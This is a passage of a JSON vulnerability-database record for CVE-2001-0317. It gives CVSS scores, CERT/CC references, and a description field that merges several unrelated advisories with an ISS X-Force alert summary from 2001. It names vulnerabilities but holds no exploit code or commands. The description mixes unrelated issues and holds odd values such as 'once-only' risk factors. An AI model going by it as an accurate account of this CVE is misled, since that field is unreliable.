                "cpe23Uri": "cpe:2.3:o:linux:linux_kernel:2.4.0:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              }
            ],
            "operator": "OR"
          }
        ]
      }
    ],
    "sources": [
      {
        "db": "NVD",
        "id": "CVE-2001-0317"
      }
    ]
  },
  "credits": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/credits#",
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": "Discovered by Michal Zalewski \u003clcamtuf@bos.bindview.com\u003e on Feb 8, 2001.",
    "sources": [
      {
        "db": "BID",
        "id": "2347"
      }
    ],
    "trust": 0.3
  },
  "cve": "CVE-2001-0317",
  "cvss": {
    "@context": {
      "cvssV2": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV2#"
        },
        "@id": "https://www.variotdbs.pl/ref/cvss/cvssV2"
      },
      "cvssV3": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV3#"
        },
        "@id": "https://www.variotdbs.pl/ref/cvss/cvssV3/"
      },
      "severity": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/cvss/severity#"
        },
        "@id": "https://www.variotdbs.pl/ref/cvss/severity"
      },
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        },
        "@id": "https://www.variotdbs.pl/ref/sources"
      }
    },
    "data": [
      {
        "cvssV2": [
          {
            "acInsufInfo": false,
            "accessComplexity": "HIGH",
            "accessVector": "LOCAL",
            "authentication": "NONE",
            "author": "NVD",
            "availabilityImpact": "PARTIAL",
            "baseScore": 3.7,
            "confidentialityImpact": "PARTIAL",
            "exploitabilityScore": 1.9,
            "impactScore": 6.4,
            "integrityImpact": "PARTIAL",
            "obtainAllPrivilege": false,
            "obtainOtherPrivilege": false,
            "obtainUserPrivilege": false,
            "severity": "LOW",
            "trust": 1.0,
            "userInteractionRequired": false,
            "vectorString": "AV:L/AC:H/Au:N/C:P/I:P/A:P",
            "version": "2.0"
          }
        ],
        "cvssV3": [],
        "severity": [
          {
            "author": "NVD",
            "id": "CVE-2001-0317",
            "trust": 1.0,
            "value": "LOW"
          },
          {
            "author": "CARNEGIE MELLON",
            "id": "VU#290140",
            "trust": 0.8,
            "value": "21.09"
          },
          {
            "author": "CARNEGIE MELLON",
            "id": "VU#13877",
            "trust": 0.8,
            "value": "6.84"
          },
          {
            "author": "CARNEGIE MELLON",
            "id": "VU#25309",
            "trust": 0.8,
            "value": "0.39"
          },
          {
            "author": "CARNEGIE MELLON",
            "id": "VU#945216",
            "trust": 0.8,
            "value": "99.00"
          },
          {
            "author": "CARNEGIE MELLON",
            "id": "VU#566640",
            "trust": 0.8,
            "value": "0.68"
          },
          {
            "author": "CARNEGIE MELLON",
            "id": "VU#651994",
            "trust": 0.8,
            "value": "1.50"
          },
          {
            "author": "CARNEGIE MELLON",
            "id": "VU#315308",
            "trust": 0.8,
            "value": "2.06"
          },
          {
            "author": "CNNVD",
            "id": "CNNVD-200105-038",
            "trust": 0.6,
            "value": "LOW"
          }
        ]
      }
    ],
    "sources": [
      {
        "db": "CERT/CC",
        "id": "VU#290140"
      },
      {
        "db": "CERT/CC",
        "id": "VU#13877"
      },
      {
        "db": "CERT/CC",
        "id": "VU#25309"
      },
      {
        "db": "CERT/CC",
        "id": "VU#945216"
      },
      {
        "db": "CERT/CC",
        "id": "VU#566640"
      },
      {
        "db": "CERT/CC",
        "id": "VU#651994"
      },
      {
        "db": "CERT/CC",
        "id": "VU#315308"
      },
      {
        "db": "NVD",
        "id": "CVE-2001-0317"
      },
      {
        "db": "CNNVD",
        "id": "CNNVD-200105-038"
      }
    ]
  },
  "description": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/description#",
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": "Race condition in ptrace in Linux kernel 2.4 and 2.2 allows local users to gain privileges by using ptrace to track and modify a running setuid process. Multiple Cisco networking products contain a denial-of-service vulnerability. There is an information integrity vulnerability in the SSH1 protocol that allows packets encrypted with a block cipher to be modified without notice. There is a remote integer overflow vulnerability in several implementations of the SSH1 protocol that allows an attacker to execute arbitrary code with the privileges of the SSH daemon, typically root. The program pgp4pine version 1.75.6 fails to properly identify expired keys when working with the Gnu Privacy Guard program (GnuPG). This failure may result in the clear-text transmission of senstive information when used with the PINE mail reading package. The SEDUM web server permits intruders to access files outside the web root. Secure Shell, or SSH, is an encrypted remote access protocol.  SSH or code based on SSH is used by many systems all over the world and in a wide variety of commercial applications.  An integer-overflow bug in the CRC32 compensation attack detection code may allow remote attackers to write values to arbitrary locations in memory. \nThis would occur in situations where large SSH packets are recieved by either a client or server, and a 32 bit representation of the SSH packet length is assigned to a 16 bit integer.  The difference in data representation in these situations will cause the 16 bit variable to be assigned to zero (or a really low value). \nAs a result, future calls to malloc() as well as an index used to reference locations in memory can be corrupted by an attacker.  This could occur in a manner that can be exploited to write certain numerical values to almost arbitrary locations in memory. \n**UPDATE**:\nThere have been reports suggesting that exploitation of this vulnerability may be widespread. \nSince early september, independent, reliable sources have confirmed that this vulnerability is being exploited by attackers on the Internet.  Security Focus does not currently have the exploit code being used, however this record will be updated if and when it becomes available. \nNOTE: Cisco 11000 Content Service Switch family is  vulnerable to this issue. All WebNS releases prior, but excluding, versions: 4.01 B42s, 4.10 22s, 5.0 B11s, 5.01 B6s, are vulnerable. \nSecure Computing SafeWord Agent for SSH is reportedly prone to this issue, as it is based on a vulnerable version of SSH. \n** NetScreen ScreenOS is not directly vulnerable to this issue, however the referenced exploit will cause devices using vulnerable versions of the software to stop functioning properly. This will result in a denial of service condition for NetScreen devices. This issue is in the Secure Command Shell (SCS) administrative interface, which is an implementation of SSHv1. SCS is not enabled on NetScreen devices by default. \nCisco has reported that scanning for SSH vulnerabilities on affected devices will cause excessive CPU consumption.  The condition is due to a failure of the Cisco SSH implementation to properly process large SSH packets.  As many of these devices are critical infrastructure components, more serious network outages may occur. \nCisco has released upgrades that will eliminate this vulnerability.  An expired public key could cause GPG to fail the encryption of an outgoing message, without any error message or warning being delivered to the user.  As a result, the user could transmit data, meant to be encrypted, as plaintext. \nTO UNSUBSCRIBE: email \"unsubscribe alert\" in the body of your message to\nmajordomo@iss.net  Contact alert-owner@iss.net for help with any problems!\n---------------------------------------------------------------------------\n\n-----BEGIN PGP SIGNED MESSAGE-----\n\nISS X-Force has received reports that some individuals were unable to \nverify the PGP signature on the Security Alert Summary distributed earlier \nin the week. Due to this issue, X-Force is re-distributing the Security \nAlert Summary. We apologize for any inconvience this may have caused. \n\nInternet Security Systems Security Alert Summary\nMarch 5, 2001\nVolume 6 Number 4\n\nX-Force Vulnerability and Threat Database: http://xforce.iss.net/ To\nreceive these Alert Summaries as well as other Alerts and Advisories,\nsubscribe to the Internet Security Systems Alert mailing list at:\nhttp://xforce.iss.net/maillists/index.php\n\nThis summary can be found at http://xforce.iss.net/alerts/vol-6_num-4.php\n_____\n\nContents\n\n90 Reported Vulnerabilities\n\nRisk Factor Key\n\n_____\n\nDate Reported:          2/27/01\nVulnerability:          a1-server-dos\nPlatforms Affected:     A1 Server\nRisk Factor:            Medium\nAttack Type:            Network Based\nBrief Description:      A1 Server denial of service\nX-Force URL:            http://xforce.iss.net/static/6161.php\n\n_____\n\nDate Reported:          2/27/01\nVulnerability:          a1-server-directory-traversal\nPlatforms Affected:     A1 Server\nRisk Factor:            Medium\nAttack Type:            Network Based\nBrief Description:      A1 Server directory traversal\nX-Force URL:            http://xforce.iss.net/static/6162.php\n\n_____\n\nDate Reported:          2/27/01\nVulnerability:          webreflex-web-server-dos\nPlatforms Affected:     WebReflex\nRisk Factor:            Medium\nAttack Type:            Network Based\nBrief Description:      WebReflex Web server denial of service\nX-Force URL:            http://xforce.iss.net/static/6163.php\n\n_____\n\nDate Reported:          2/26/01\nVulnerability:          sudo-bo-elevate-privileges\nPlatforms Affected:     Sudo\nRisk Factor:            Medium\nAttack Type:            Host Based\nBrief Description:      Sudo buffer overflow could allow elevated user privileges\nX-Force URL:            http://xforce.iss.net/static/6153.php\n\n_____\n\nDate Reported:          2/26/01\nVulnerability:          mygetright-skin-overwrite-file\nPlatforms Affected:     My GetRight\nRisk Factor:            High\nAttack Type:            Network Based\nBrief Description:      My GetRight \u0027skin\u0027 allows remote attacker to overwrite existing files\nX-Force URL:            http://xforce.iss.net/static/6155.php\n\n_____\n\nDate Reported:          2/26/01\nVulnerability:          mygetright-directory-traversal\nPlatforms Affected:     My GetRight\nRisk Factor:            Medium\nAttack Type:            Network Based\nBrief Description:      My GetRight directory traversal\nX-Force URL:            http://xforce.iss.net/static/6156.php\n\n_____\n\nDate Reported:          2/26/01\nVulnerability:          win2k-event-viewer-bo\nPlatforms Affected:     Windows 2000\nRisk Factor:            once-only\nAttack Type:            Host Based\nBrief Description:      Windows 2000 event viewer buffer overflow\nX-Force URL:            http://xforce.iss.net/static/6160.php\n\n_____\n\nDate Reported:          2/26/01\nVulnerability:          netscape-collabra-cpu-dos\nPlatforms Affected:     Netscape\nRisk Factor:            Medium\nAttack Type:            Network Based\nBrief Description:      Netscape Collabra CPU denial of service\nX-Force URL:            http://xforce.iss.net/static/6159.php\n\n_____\n\nDate Reported:          2/26/01\nVulnerability:          netscape-collabra-kernel-dos\nPlatforms Affected:     Netscape\nRisk Factor:            Medium\nAttack Type:            Network Based\nBrief Description:      Netscape Collabra Server kernel denial of service\nX-Force URL:            http://xforce.iss.net/static/6158.php\n\n_____\n\nDate Reported:          2/23/01\nVulnerability:          mercur-expn-bo\nPlatforms Affected:     MERCUR\nRisk Factor:            High\nAttack Type:            Network Based\nBrief Description:      MERCUR Mailserver EXPN buffer overflow\nX-Force URL:            http://xforce.iss.net/static/6149.php\n\n_____\n\nDate Reported:          2/23/01\nVulnerability:          sedum-http-dos\nPlatforms Affected:     SEDUM\nRisk Factor:            Medium\nAttack Type:            Network Based\nBrief Description:      SEDUM HTTP server denial of service\nX-Force URL:            http://xforce.iss.net/static/6152.php\n\n_____\n\nDate Reported:          2/23/01\nVulnerability:          tru64-inetd-dos\nPlatforms Affected:     Tru64\nRisk Factor:            Medium\nAttack Type:            Host Based\nBrief Description:      Tru64 UNIX inetd denial of service\nX-Force URL:            http://xforce.iss.net/static/6157.php\n\n_____\n\nDate Reported:          2/22/01\nVulnerability:          outlook-vcard-bo\nPlatforms Affected:     Microsoft Outlook\nRisk Factor:            High\nAttack Type:            Host Based\nBrief Description:      Outlook and Outlook Express vCards buffer overflow\nX-Force URL:            http://xforce.iss.net/static/6145.php\n\n_____\n\nDate Reported:          2/22/01\nVulnerability:          ultimatebb-cookie-member-number\nPlatforms Affected:     Ultimate Bulletin Board\nRisk Factor:            High\nAttack Type:            Network Based\nBrief Description:      Ultimate Bulletin Board cookie allows attacker to change member number\nX-Force URL:            http://xforce.iss.net/static/6144.php\n\n_____\n\nDate Reported:          2/21/01\nVulnerability:          ultimatebb-cookie-gain-privileges\nPlatforms Affected:     Ultimate Bulletin Board\nRisk Factor:            Medium\nAttack Type:            Network Based\nBrief Description:      Ultimate Bulletin Board allows remote attacker to obtain cookie information\nX-Force URL:            http://xforce.iss.net/static/6142.php\n\n_____\n\nDate Reported:          2/21/01\nVulnerability:          sendmail-elevate-privileges\nPlatforms Affected:     Sendmail\nRisk Factor:            High\nAttack Type:            Host Based\nBrief Description:      Sendmail -bt command could allow the elevation of privileges\nX-Force URL:            http://xforce.iss.net/static/6147.php\n\n_____\n\nDate Reported:          2/21/01\nVulnerability:          jre-jdk-execute-commands\nPlatforms Affected:     JRE/JDK\nRisk Factor:            High\nAttack Type:            Host Based\nBrief Description:      JRE/JDK could allow unauthorized execution of commands\nX-Force URL:            http://xforce.iss.net/static/6143.php\n\n_____\n\nDate Reported:          2/20/01\nVulnerability:          licq-remote-port-dos\nPlatforms Affected:     LICQ\nRisk Factor:            Medium\nAttack Type:            Network Based\nBrief Description:      LICQ remote denial of service\nX-Force URL:            http://xforce.iss.net/static/6134.php\n\n_____\n\nDate Reported:          2/20/01\nVulnerability:          pgp4pine-expired-keys\nPlatforms Affected:     pgp4pine\nRisk Factor:            Medium\nAttack Type:            Host Based\nBrief Description:      pgp4pine may transmit messages using expired public keys\nX-Force URL:            http://xforce.iss.net/static/6135.php\n\n_____\n\nDate Reported:          2/20/01\nVulnerability:          chilisoft-asp-view-files\nPlatforms Affected:     Chili!Soft ASP\nRisk Factor:            High\nAttack Type:            Network Based\nBrief Description:      Chili!Soft ASP allows remote attackers to gain access to sensitive information\nX-Force URL:            http://xforce.iss.net/static/6137.php\n\n_____\n\nDate Reported:          2/20/01\nVulnerability:          win2k-domain-controller-dos\nPlatforms Affected:     Windows 2000\nRisk Factor:            once-only\nAttack Type:            Network/Host Based\nBrief Description:      Windows 2000 domain controller denial of service\nX-Force URL:            http://xforce.iss.net/static/6136.php\n\n_____\n\nDate Reported:          2/19/01\nVulnerability:          asx-remote-dos\nPlatforms Affected:     ASX Switches\nRisk Factor:            Medium\nAttack Type:            Network Based\nBrief Description:      ASX switches allow remote denial of service\nX-Force URL:            http://xforce.iss.net/static/6133.php\n\n_____\n\nDate Reported:          2/18/01\nVulnerability:          http-cgi-mailnews-username\nPlatforms Affected:     Mailnews.cgi\nRisk Factor:            High\nAttack Type:            Network Based\nBrief Description:      Mailnews.cgi allows remote attacker to execute shell commands using username\nX-Force URL:            http://xforce.iss.net/static/6139.php\n\n_____\n\nDate Reported:          2/17/01\nVulnerability:          badblue-ext-reveal-path\nPlatforms Affected:     BadBlue\nRisk Factor:            Low\nAttack Type:            Network Based\nBrief Description:      BadBlue ext.dll library reveals path\nX-Force URL:            http://xforce.iss.net/static/6130.php\n\n_____\n\nDate Reported:          2/17/01\nVulnerability:          badblue-ext-dos\nPlatforms Affected:     BadBlue\nRisk Factor:            Medium\nAttack Type:            Network Based\nBrief Description:      BadBlue ext.dll library denial of service\nX-Force URL:            http://xforce.iss.net/static/6131.php\n\n_____\n\nDate Reported:          2/17/01\nVulnerability:          moby-netsuite-bo\nPlatforms Affected:     Moby\u0027s NetSuite\nRisk Factor:            Medium\nAttack Type:            Network Based\nBrief Description:      Moby\u0027s NetSuite Web server buffer overflow\nX-Force URL:            http://xforce.iss.net/static/6132.php\n\n_____\n\nDate Reported:          2/16/01\nVulnerability:          webactive-directory-traversal\nPlatforms Affected:     WEBactive\nRisk Factor:            Medium\nAttack Type:            Network/Host Based\nBrief Description:      WEBactive HTTP Server directory traversal\nX-Force URL:            http://xforce.iss.net/static/6121.php\n\n_____\n\nDate Reported:          2/16/01\nVulnerability:          esone-cgi-directory-traversal\nPlatforms Affected:     ES.One store.cgi\nRisk Factor:            Medium\nAttack Type:            Network Based\nBrief Description:      Thinking Arts ES.One store.cgi directory traversal\nX-Force URL:            http://xforce.iss.net/static/6124.php\n\n_____\n\nDate Reported:          2/16/01\nVulnerability:          vshell-username-bo\nPlatforms Affected:     VShell\nRisk Factor:            High\nAttack Type:            Network Based\nBrief Description:      VShell username buffer overflow\nX-Force URL:            http://xforce.iss.net/static/6146.php\n\n_____\n\nDate Reported:          2/16/01\nVulnerability:          vshell-port-forwarding-rule\nPlatforms Affected:     VShell\nRisk Factor:            Medium\nAttack Type:            Network/Host Based\nBrief Description:      VShell uses weak port forwarding rule\nX-Force URL:            http://xforce.iss.net/static/6148.php\n\n_____\n\nDate Reported:          2/15/01\nVulnerability:          pi3web-isapi-bo\nPlatforms Affected:     Pi3Web\nRisk Factor:            Medium\nAttack Type:            Network/Host Based\nBrief Description:      Pi3Web ISAPI tstisapi.dll denial of service\nX-Force URL:            http://xforce.iss.net/static/6113.php\n\n_____\n\nDate Reported:          2/15/01\nVulnerability:          pi3web-reveal-path\nPlatforms Affected:     Pi3Web\nRisk Factor:            Low\nAttack Type:            Network Based\nBrief Description:      Pi3Web reveals physical path of server\nX-Force URL:            http://xforce.iss.net/static/6114.php\n\n_____\n\nDate Reported:          2/15/01\nVulnerability:          bajie-execute-shell\nPlatforms Affected:     Bajie HTTP JServer\nRisk Factor:            High\nAttack Type:            Network Based\nBrief Description:      Bajie HTTP JServer execute shell commands\nX-Force URL:            http://xforce.iss.net/static/6117.php\n\n_____\n\nDate Reported:          2/15/01\nVulnerability:          bajie-directory-traversal\nPlatforms Affected:     Bajie HTTP JServer\nRisk Factor:            High\nAttack Type:            Network Based\nBrief Description:      Bajie HTTP JServer directory traversal\nX-Force URL:            http://xforce.iss.net/static/6115.php\n\n_____\n\nDate Reported:          2/15/01\nVulnerability:          resin-directory-traversal\nPlatforms Affected:     Resin\nRisk Factor:            Medium\nAttack Type:            Network Based\nBrief Description:      Resin Web server directory traversal\nX-Force URL:            http://xforce.iss.net/static/6118.php\n\n_____\n\nDate Reported:          2/15/01\nVulnerability:          netware-mitm-recover-passwords\nPlatforms Affected:     Netware\nRisk Factor:            Low\nAttack Type:            Network Based\nBrief Description:      Netware \"man in the middle\" attack password recovery\nX-Force URL:            http://xforce.iss.net/static/6116.php\n\n_____\n\nDate Reported:          2/14/01\nVulnerability:          firebox-pptp-dos\nPlatforms Affected:     WatchGuard Firebox II\nRisk Factor:            High\nAttack Type:            Network Based\nBrief Description:      WatchGuard Firebox II PPTP denial of service\nX-Force URL:            http://xforce.iss.net/static/6109.php\n\n_____\n\nDate Reported:          2/14/01\nVulnerability:          hp-virtualvault-iws-dos\nPlatforms Affected:     HP VirtualVault\nRisk Factor:            Medium\nAttack Type:            Network/Host Based\nBrief Description:      HP VirtualVault iPlanet Web Server denial of service\nX-Force URL:            http://xforce.iss.net/static/6110.php\n\n_____\n\nDate Reported:          2/14/01\nVulnerability:          kicq-execute-commands\nPlatforms Affected:     KICQ\nRisk Factor:            High\nAttack Type:            Network Based\nBrief Description:      kicq could allow remote execution of commands\nX-Force URL:            http://xforce.iss.net/static/6112.php\n\n_____\n\nDate Reported:          2/14/01\nVulnerability:          hp-text-editor-bo\nPlatforms Affected:     HPUX\nRisk Factor:            Medium\nAttack Type:            Host Based\nBrief Description:      HP Text editors buffer overflow\nX-Force URL:            http://xforce.iss.net/static/6111.php\n\n_____\n\nDate Reported:          2/13/01\nVulnerability:          sendtemp-pl-read-files\nPlatforms Affected:     sendtemp.pl\nRisk Factor:            Medium\nAttack Type:            Network/Host Based\nBrief Description:      sendtemp.pl could allow an attacker to read files on the server\nX-Force URL:            http://xforce.iss.net/static/6104.php\n\n_____\n\nDate Reported:          2/13/01\nVulnerability:          analog-alias-bo\nPlatforms Affected:     Analog ALIAS\nRisk Factor:            Medium\nAttack Type:            Network/Host Based\nBrief Description:      Analog ALIAS command buffer overflow\nX-Force URL:            http://xforce.iss.net/static/6105.php\n\n_____\n\nDate Reported:          2/13/01\nVulnerability:          elm-long-string-bo\nPlatforms Affected:     Elm\nRisk Factor:            Medium\nAttack Type:            Host Based\nBrief Description:      ELM -f command long string buffer overflow\nX-Force URL:            http://xforce.iss.net/static/6151.php\n\n_____\n\nDate Reported:          2/13/01\nVulnerability:          winnt-pptp-dos\nPlatforms Affected:     Windows NT\nRisk Factor:            Medium\nAttack Type:            Network Based\nBrief Description:      Windows NT PPTP denial of service\nX-Force URL:            http://xforce.iss.net/static/6103.php\n\n_____\n\nDate Reported:          2/12/01\nVulnerability:          startinnfeed-format-string\nPlatforms Affected:     Inn\nRisk Factor:            High\nAttack Type:            Host Based\nBrief Description:      Inn \u0027startinnfeed\u0027 binary format string attack\nX-Force URL:            http://xforce.iss.net/static/6099.php\n\n_____\n\nDate Reported:          2/12/01\nVulnerability:          his-auktion-cgi-url\nPlatforms Affected:     HIS Auktion\nRisk Factor:            Medium\nAttack Type:            Network/Host Based\nBrief Description:      HIS Auktion CGI script could allow attackers to view unauthorized \n                        files or execute commands\nX-Force URL:            http://xforce.iss.net/static/6090.php\n\n_____\n\nDate Reported:          2/12/01\nVulnerability:          wayboard-cgi-view-files\nPlatforms Affected:     Way-BOARD\nRisk Factor:            Medium\nAttack Type:            Network Based\nBrief Description:      Way-BOARD CGI could allow attackers to view unauthorized files\nX-Force URL:            http://xforce.iss.net/static/6091.php\n\n_____\n\nDate Reported:          2/12/01\nVulnerability:          muskat-empower-url-dir\nPlatforms Affected:     Musket Empower\nRisk Factor:            Low\nAttack Type:            Network/Host Based\nBrief Description:      Musket Empower could allow attackers to gain access to the DB directory path\nX-Force URL:            http://xforce.iss.net/static/6093.php\n\n_____\n\nDate Reported:          2/12/01\nVulnerability:          icq-icu-rtf-dos\nPlatforms Affected:     LICQ\n                        Gnome ICU\nRisk Factor:            Low\nAttack Type:            Network/Host Based\nBrief Description:      LICQ and Gnome ICU rtf file denial of service\nX-Force URL:            http://xforce.iss.net/static/6096.php\n\n_____\n\nDate Reported:          2/12/01\nVulnerability:          commerce-cgi-view-files\nPlatforms Affected:     Commerce.cgi\nRisk Factor:            Medium\nAttack Type:            Network Based\nBrief Description:      Commerce.cgi could allow attackers to view unauthorized files\nX-Force URL:            http://xforce.iss.net/static/6095.php\n\n_____\n\nDate Reported:          2/12/01\nVulnerability:          roads-search-view-files\nPlatforms Affected:     ROADS\nRisk Factor:            Medium\nAttack Type:            Network Based\nBrief Description:      ROADS could allow attackers to view unauthorized files using search.pl program\nX-Force URL:            http://xforce.iss.net/static/6097.php\n\n_____\n\nDate Reported:          2/12/01\nVulnerability:          webpage-cgi-view-info\nPlatforms Affected:     WebPage.cgi\nRisk Factor:            Low\nAttack Type:            Network Based\nBrief Description:      WebPage.cgi allows attackers to view sensitive information\nX-Force URL:            http://xforce.iss.net/static/6100.php\n\n_____\n\nDate Reported:          2/12/01\nVulnerability:          webspirs-cgi-view-files\nPlatforms Affected:     WebSPIRS\nRisk Factor:            Medium\nAttack Type:            Network Based\nBrief Description:      WebSPIRS CGI could allow an attacker to view unauthorized files\nX-Force URL:            http://xforce.iss.net/static/6101.php\n\n_____\n\nDate Reported:          2/12/01\nVulnerability:          webpals-library-cgi-url\nPlatforms Affected:     WebPALS\nRisk Factor:            Medium\nAttack Type:            Network Based\nBrief Description:      WebPALS Library System CGI script could allow attackers to view \n                        unauthorized files or execute commands\nX-Force URL:            http://xforce.iss.net/static/6102.php\n\n_____\n\nDate Reported:          2/11/01\nVulnerability:          cobol-apptrack-nolicense-permissions\nPlatforms Affected:     MicroFocus Cobol\nRisk Factor:            High\nAttack Type:            Host Based\nBrief Description:      MicroFocus Cobol with AppTrack enabled with nolicense permissions\nX-Force URL:            http://xforce.iss.net/static/6092.php\n\n_____\n\nDate Reported:          2/11/01\nVulnerability:          cobol-apptrack-nolicense-symlink\nPlatforms Affected:     MicroFocus Cobol\nRisk Factor:            High\nAttack Type:            Host Based\nBrief Description:      MicroFocus Cobol with AppTrack enabled allows symlink in nolicense\nX-Force URL:            http://xforce.iss.net/static/6094.php\n\n_____\n\nDate Reported:          2/10/01\nVulnerability:          vixie-crontab-bo\nPlatforms Affected:     Vixie crontab\nRisk Factor:            Medium\nAttack Type:            Host Based\nBrief Description:      Vixie crontab buffer overflow\nX-Force URL:            http://xforce.iss.net/static/6098.php\n\n_____\n\nDate Reported:          2/10/01\nVulnerability:          novell-groupwise-bypass-policies\nPlatforms Affected:     Novell GroupWise\nRisk Factor:            Medium\nAttack Type:            Network/Host Based\nBrief Description:      Novell Groupwise allows user to bypass policies and view files\nX-Force URL:            http://xforce.iss.net/static/6089.php\n\n_____\n\nDate Reported:          2/9/01\nVulnerability:          infobot-calc-gain-access\nPlatforms Affected:     Infobot\nRisk Factor:            High\nAttack Type:            Network Based\nBrief Description:      Infobot \u0027calc\u0027 command allows remote users to gain access\nX-Force URL:            http://xforce.iss.net/static/6078.php\n\n_____\n\nDate Reported:          2/8/01\nVulnerability:          linux-sysctl-read-memory\nPlatforms Affected:     Linux\nRisk Factor:            Medium\nAttack Type:            Host Based\nBrief Description:      Linux kernel sysctl() read memory\nX-Force URL:            http://xforce.iss.net/static/6079.php\n\n_____\n\nDate Reported:          2/8/01\nVulnerability:          openssh-bypass-authentication\nPlatforms Affected:     OpenSSH\nRisk Factor:            High\nAttack Type:            Network/Host Based\nBrief Description:      OpenSSH 2.3.1 allows remote users to bypass authentication\nX-Force URL:            http://xforce.iss.net/static/6084.php\n\n_____\n\nDate Reported:          2/8/01\nVulnerability:          lotus-notes-stored-forms\nPlatforms Affected:     Lotus Notes\nRisk Factor:            High\nAttack Type:            Network/Host Based\nBrief Description:      Lotus Notes stored forms\nX-Force URL:            http://xforce.iss.net/static/6087.php\n\n_____\n\nDate Reported:          2/8/01\nVulnerability:          linux-ptrace-modify-process\nPlatforms Affected:     Linux\nRisk Factor:            High\nAttack Type:            Host Based\nBrief Description:      Linux kernel ptrace modify process\nX-Force URL:            http://xforce.iss.net/static/6080.php\n\n_____\n\nDate Reported:          2/8/01\nVulnerability:          ssh-deattack-overwrite-memory\nPlatforms Affected:     SSH\nRisk Factor:            High\nAttack Type:            Network/Host Based\nBrief Description:      SSH protocol 1.5 deattack.c allows memory to be overwritten\nX-Force URL:            http://xforce.iss.net/static/6083.php\n\n_____\n\nDate Reported:          2/7/01\nVulnerability:          dc20ctrl-port-bo\nPlatforms Affected:     FreeBSD\nRisk Factor:            Medium\nAttack Type:            Host Based\nBrief Description:      FreeBSD dc20ctrl port buffer overflow\nX-Force URL:            http://xforce.iss.net/static/6077.php\n\n_____\n\nDate Reported:          2/7/01\nVulnerability:          ja-xklock-bo\nPlatforms Affected:     FreeBSD\nRisk Factor:            High\nAttack Type:            Host Based\nBrief Description:      ja-xklock buffer overflow\nX-Force URL:            http://xforce.iss.net/static/6073.php\n\n_____\n\nDate Reported:          2/7/01\nVulnerability:          ja-elvis-elvrec-bo\nPlatforms Affected:     FreeBSD\nRisk Factor:            High\nAttack Type:            Host Based\nBrief Description:      FreeBSD ja-elvis port buffer overflow\nX-Force URL:            http://xforce.iss.net/static/6074.php\n\n_____\n\nDate Reported:          2/7/01\nVulnerability:          ko-helvis-elvrec-bo\nPlatforms Affected:     FreeBSD\nRisk Factor:            High\nAttack Type:            Host Based\nBrief Description:      FreeBSD ko-helvis port buffer overflow\nX-Force URL:            http://xforce.iss.net/static/6075.php\n\n_____\n\nDate Reported:          2/7/01\nVulnerability:          serverworx-directory-traversal\nPlatforms Affected:     ServerWorx\nRisk Factor:            Medium\nAttack Type:            Network Based\nBrief Description:      ServerWorx directory traversal\nX-Force URL:            http://xforce.iss.net/static/6081.php\n\n_____\n\nDate Reported:          2/7/01\nVulnerability:          ntlm-ssp-elevate-privileges\nPlatforms Affected:     NTLM\nRisk Factor:            High\nAttack Type:            Host Based\nBrief Description:      NTLM Security Support Provider could allow elevation of privileges\nX-Force URL:            http://xforce.iss.net/static/6076.php\n\n_____\n\nDate Reported:          2/7/01\nVulnerability:          ssh-session-key-recovery\nPlatforms Affected:     SSH\nRisk Factor:            High\nAttack Type:            Network/Host Based\nBrief Description:      SSH protocol 1.5 session key recovery\nX-Force URL:            http://xforce.iss.net/static/6082.php\n\n_____\n\nDate Reported:          2/6/01\nVulnerability:          aolserver-directory-traversal\nPlatforms Affected:     AOLserver\nRisk Factor:            Medium\nAttack Type:            Network Based\nBrief Description:      AOLserver directory traversal\nX-Force URL:            http://xforce.iss.net/static/6069.php\n\n_____\n\nDate Reported:          2/6/01\nVulnerability:          chilisoft-asp-elevate-privileges\nPlatforms Affected:     Chili!Soft\nRisk Factor:            High\nAttack Type:            Network/Host Based\nBrief Description:      Chili!Soft ASP could allow elevated privileges\nX-Force URL:            http://xforce.iss.net/static/6072.php\n\n_____\n\nDate Reported:          2/6/01\nVulnerability:          win-udp-dos\nPlatforms Affected:     Windows\nRisk Factor:            Medium\nAttack Type:            Network/Host Based\nBrief Description:      Windows UDP socket denial of service\nX-Force URL:            http://xforce.iss.net/static/6070.php\n\n_____\n\nDate Reported:          2/5/01\nVulnerability:          ssh-daemon-failed-login\nPlatforms Affected:     SSH\nRisk Factor:            High\nAttack Type:            Network/Host Based\nBrief Description:      SSH daemon failed login attempts are not logged\nX-Force URL:            http://xforce.iss.net/static/6071.php\n\n_____\n\nDate Reported:          2/5/01\nVulnerability:          picserver-directory-traversal\nPlatforms Affected:     PicServer\nRisk Factor:            Medium\nAttack Type:            Network Based\nBrief Description:      PicServer directory traversal\nX-Force URL:            http://xforce.iss.net/static/6065.php\n\n_____\n\nDate Reported:          2/5/01\nVulnerability:          biblioweb-directory-traversal\nPlatforms Affected:     BiblioWeb\nRisk Factor:            Medium\nAttack Type:            Network Based\nBrief Description:      BiblioWeb Server directory traversal\nX-Force URL:            http://xforce.iss.net/static/6066.php\n\n_____\n\nDate Reported:          2/5/01\nVulnerability:          biblioweb-get-dos\nPlatforms Affected:     BiblioWeb\nRisk Factor:            Low\nAttack Type:            Network Based\nBrief Description:      BiblioWeb Server GET request denial of service\nX-Force URL:            http://xforce.iss.net/static/6068.php\n\n_____\n\nDate Reported:          2/5/01\nVulnerability:          ibm-netcommerce-reveal-information\nPlatforms Affected:     IBM\nRisk Factor:            Medium\nAttack Type:            Network/Host Based\nBrief Description:      IBM Net.Commerce could reveal sensitive information\nX-Force URL:            http://xforce.iss.net/static/6067.php\n\n_____\n\nDate Reported:          2/5/01\nVulnerability:          win-dde-elevate-privileges\nPlatforms Affected:     Windows DDE\nRisk Factor:            High\nAttack Type:            Host Based\nBrief Description:      Windows DDE can allow the elevation of privileges\nX-Force URL:            http://xforce.iss.net/static/6062.php\n\n_____\n\nDate Reported:          2/4/01\nVulnerability:          hsweb-directory-browsing\nPlatforms Affected:     HSWeb\nRisk Factor:            Low\nAttack Type:            Network Based\nBrief Description:      